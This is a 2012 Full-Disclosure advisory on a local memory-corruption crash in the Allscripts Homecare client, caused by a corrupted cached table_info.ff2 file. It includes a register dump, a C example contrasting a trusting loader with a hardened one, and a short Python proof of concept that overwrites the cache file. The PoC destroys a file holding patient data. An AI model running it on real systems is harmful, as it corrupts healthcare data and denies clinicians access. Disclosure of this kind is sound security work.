Date: Thu, 25 Oct 2012 08:33:34 -0400
From: Thomas Richards <g13net@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Allscripts Homecare Client Local Memory Corruption table_info.ff2

# Title: Allscripts Homecare Client Local Memory Corruption table_info.ff2
# Date: 10/25/12
# Author: G13
# Software Link: http://www.allscripts.com/en/solutions/post-acute-solutions/homecare/show/overview.html
# Version: 6.1.0, 7.0.1
# Category: Application (local)
# Tested on: Windows 7 Pro 64 Bit
# dc585

###### Introduction ######

Allscripts Homecare is an industry leading home care system designed to improve
clinical quality of care, financial performance, and operational control for
large, integrated home care organizations and small home care companies.
Business, clinical, and scheduling functionality for multiple lines of
business—home health, hospice, and private duty—are combined seamlessly in one
integrated home care software system.

###### Report Timeline ######

12/22/11 - Discovery
01/12/12 - Vendor Notification
10/25/12 - Disclosure

###### Exploit Technique ######

Local

###### Details ######

A memory corruption vulnerability was found in Allscripts Homecare 6.1.0 (the
affected versions listed above also include 7.0.1). It is triggered when the
client processes a corrupt .ff2 file from the program's local cache, resulting
in an access violation. The specific file is table_info.ff2. The cache holds a
local copy of patient and system data and is accessible to users. Corrupting
this file denies users access to the program and may result in loss of data.

Two practical caveats. The exception log below shows EDX = 41414141 (the 'A'
bytes from the corrupted file) while EIP is still inside the MHC module, so
what is demonstrated is a crash (denial of service), not controlled code
execution. And since the PoC writes beneath Program Files (x86), the attack
only crosses a privilege boundary if the installer grants standard users write
access to the cache directory; on Windows 7 that location is otherwise
writable only by administrators.

Other versions are possibly affected.
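The bug class behind a crash like this, as an added illustration that is not
code from Allscripts or from the advisory author: a loader that trusts a
record count read from its own cache file, beside one that treats the cache as
untrusted input. The record layout, the MAX_RECORDS bound and the sample table
are assumptions made for the example; the real .ff2 format is not documented
on this page.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Assumed sane upper bound on records in one cache table (illustrative). */
#define MAX_RECORDS 1024

/* Hypothetical layout, NOT the real .ff2 format (the advisory does not
 * document it): a 4-byte little-endian record count, then that many
 * 8-byte records of {key, value}. */
struct rec { uint32_t key; uint32_t value; };

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Trusting loader: the bug pattern. The record count is taken straight from
 * the file, so a table_info.ff2 full of 'A' yields n = 0x41414141 and the
 * loop reads gigabytes past the buffer; on Windows that surfaces as an
 * access violation with 41414141 sitting in a register, as in the exception
 * log. Kept for comparison only; never run it on untrusted data. */
static uint32_t sum_values_trusting(const uint8_t *buf)
{
    uint32_t n = le32(buf), sum = 0;
    for (uint32_t i = 0; i < n; i++)
        sum += le32(buf + 4 + (size_t)i * 8 + 4);   /* unchecked index */
    return sum;
}

/* Hardened loader: the cache file is untrusted input. Every length derived
 * from it is checked against the real buffer size before any access.
 * Returns the number of records copied into out, or -1 if malformed. */
static int load_table(const uint8_t *buf, size_t len,
                      struct rec *out, size_t max_out)
{
    if (buf == NULL || out == NULL || len < 4)
        return -1;                     /* truncated header */
    uint32_t n = le32(buf);
    if (n > MAX_RECORDS || n > max_out)
        return -1;                     /* implausible count; 0x41414141 lands here */
    if ((size_t)n * 8 != len - 4)
        return -1;                     /* body size disagrees with count */
    for (uint32_t i = 0; i < n; i++) {
        const uint8_t *r = buf + 4 + (size_t)i * 8;
        out[i].key   = le32(r);
        out[i].value = le32(r + 4);
    }
    return (int)n;
}

/* Load a table with the hardened loader and return the sum of its values,
 * or -1 if the loader rejected it. */
static long table_value_sum(const uint8_t *buf, size_t len)
{
    struct rec recs[MAX_RECORDS];
    int n = load_table(buf, len, recs, MAX_RECORDS);
    if (n < 0)
        return -1;
    long sum = 0;
    for (int i = 0; i < n; i++)
        sum += recs[i].value;
    return sum;
}

/* Build the advisory's payload (a run of n 'A' bytes, as the PoC writes)
 * and feed it to the hardened loader. Returns the loader's result. */
static int load_poc_payload(size_t n)
{
    uint8_t buf[256];
    struct rec recs[MAX_RECORDS];
    if (n > sizeof buf)
        return -2;
    memset(buf, 'A', n);
    return load_table(buf, n, recs, MAX_RECORDS);
}

/* Constructed sample table (not captured from the product): two records. */
static const uint8_t GOOD_TABLE[] = {
    2, 0, 0, 0,                     /* count = 2          */
    1, 0, 0, 0,  0x10, 0, 0, 0,     /* {key 1, value 16}  */
    2, 0, 0, 0,  0x20, 0, 0, 0,     /* {key 2, value 32}  */
};

int main(void)
{
    printf("trusting loader, good table: sum=%u\n",
           sum_values_trusting(GOOD_TABLE));
    printf("hardened loader, good table: sum=%ld\n",
           table_value_sum(GOOD_TABLE, sizeof GOOD_TABLE));
    printf("hardened loader, PoC payload: %d (expected -1)\n",
           load_poc_payload(39));
    return 0;
}
```

On the well-formed sample both loaders agree; on the all-'A' payload the
hardened loader rejects the count before any record is touched, which is the
check that turns the crash into a clean "cache corrupt, rebuild it" error.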

###### Exception Log ######

EAX 00000000
ECX 00184646
EDX 41414141
EBX 006E994F MHC.006E994F
ESP 0018F244
EBP 0018F284
ESI 006E994F MHC.006E994F
EDI 00000000
EIP 004040AF MHC.004040AF
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit FFFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_COMMITMENT_LIMIT (000005AF)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty %#.19L
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty %#.19L
               3 2 1 0      E S P U O Z D I
FST 1020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 137F  Prec NEAR,64  Mask    1 1 1 1 1 1


###### PoC ######

#!/usr/bin/python
# Overwrites the client's cached table_info.ff2 with a run of 'A' bytes.
# Raw string on purpose: in a plain string '\t' in 'client\table_info' is a
# tab, so the original literal would have pointed at the wrong path.
path = r'c:\program files (x86)\misys\homecare\client\cache\table_info.ff2'
f = open(path, 'w')
f.write('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')   # 0x41 bytes, seen as 41414141 in EDX
f.close()

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/